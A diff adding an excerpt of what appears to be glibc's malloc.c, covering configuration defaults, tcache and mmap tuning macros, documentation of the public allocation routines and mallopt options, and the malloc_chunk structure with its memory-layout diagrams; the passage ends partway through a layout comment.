+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+
+/* Maximum chunks in tcache bins for tunables.  This value must fit the range
+   of tcache->counts[] entries, else they may overflow.  */
+# define MAX_TCACHE_COUNT UINT16_MAX
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
